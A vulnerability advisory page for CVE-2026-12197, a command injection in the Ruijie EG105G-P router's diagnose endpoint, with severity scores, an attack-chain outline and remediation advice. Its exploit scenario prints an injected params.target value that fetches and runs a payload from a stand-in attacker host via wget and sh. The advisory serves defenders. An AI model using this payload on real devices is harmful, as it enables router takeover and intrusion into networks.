Skip to main content

Ruijie EG105G-P CVE-2026-12197

| EUVD-2026-36673 HIGH
Command Injection (CWE-77)
2026-06-14 VulDB GHSA-f7mp-cw7j-wx85
Command Injection Eg105G P
7.3
CVSS 4.0 · Vendor: VulDB
Share

Severity by source

Vendor (VulDB) PRIMARY
7.3 HIGH
CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vuln.today AI
7.2 HIGH

Network-reachable management endpoint (AV:N), straightforward injection (AC:L), but requires admin login to call the diagnose API (PR:H); successful injection yields full OS-level control of the device (C/I/A:H).

3.1 AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
4.0 AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Primary rating from Vendor (VulDB).

CVSS VectorVendor: VulDB

CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
High
User Interaction
None
Scope
X

Lifecycle Timeline

2
Analysis Generated
Jun 15, 2026 - 00:26 vuln.today
CVSS changed
Jun 15, 2026 - 00:22 NVD
8.6 (HIGH) 7.3 (HIGH)

DescriptionCVE.org

A security flaw has been discovered in Ruijie EG105G-P 2.340. The impacted element is the function nslookup of the file /cgi-bin/luci/api/diagnose of the component JSON-RPC Diagnose Endpoint. Performing a manipulation of the argument params.target results in command injection. It is possible to initiate the attack remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.

AnalysisAI

Command injection in the Ruijie EG105G-P 2.340 gateway router allows authenticated remote attackers to execute arbitrary OS commands by manipulating the params.target argument of the nslookup function in the /cgi-bin/luci/api/diagnose JSON-RPC endpoint. Publicly available exploit code exists, the vendor did not respond to coordinated disclosure, and successful exploitation yields full confidentiality, integrity, and availability impact on the device.

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts
Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Discover exposed EG105G-P management UI
Delivery
Obtain admin credentials (default/reuse/phish)
Exploit
POST crafted JSON-RPC to /cgi-bin/luci/api/diagnose
Execution
Inject shell metacharacters in params.target
Persist
Execute arbitrary commands on device
Impact
Install backdoor or pivot into LAN
Sign in to reveal

Vulnerability AssessmentAI

Exploitation Exploitation requires (1) network reachability to the device's HTTP management interface, specifically the /cgi-bin/luci/api/diagnose JSON-RPC endpoint, and (2) authenticated administrative access to invoke the nslookup diagnostic function (CVSS PR:H). … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 4.0 vector (AV:N/AC:L/AT:N/PR:H/UI:N) with VC:H/VI:H/VA:H produces a 7.3 base score, reflecting full device compromise but tempered by the PR:H requirement - exploitation needs high-privileged access to the management interface, which substantially narrows the threat to attackers who already hold administrative credentials (default, weak, reused, or phished) or who can reach the panel post-authentication via another flaw. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker who has obtained admin credentials for an internet-exposed EG105G-P (via password reuse, phishing, brute force, or chained access) sends a crafted JSON-RPC POST to /cgi-bin/luci/api/diagnose invoking nslookup with a params.target value such as '8.8.8.8; wget http://attacker/x -O /tmp/x; sh /tmp/x', causing the device to fetch and execute a payload. Because publicly available exploit code exists, this can be scripted at scale against Ruijie devices discovered via Shodan/ZoomEye, leading to router takeover, traffic interception, or pivoting into the LAN.
Remediation No vendor-released patch identified at time of analysis - Ruijie did not respond to VulDB's coordinated disclosure, so defenders should treat the issue as unfixed. … Detailed patch versions, workarounds, and compensating controls in full report.
Sign in to read full assessment

Recommended ActionAI

Within 24 hours: Audit all Ruijie EG105G-P 2.340 gateways in production and restrict administrative interface access (/cgi-bin/luci endpoints) to trusted networks only; disable remote management if not required. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-12197 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy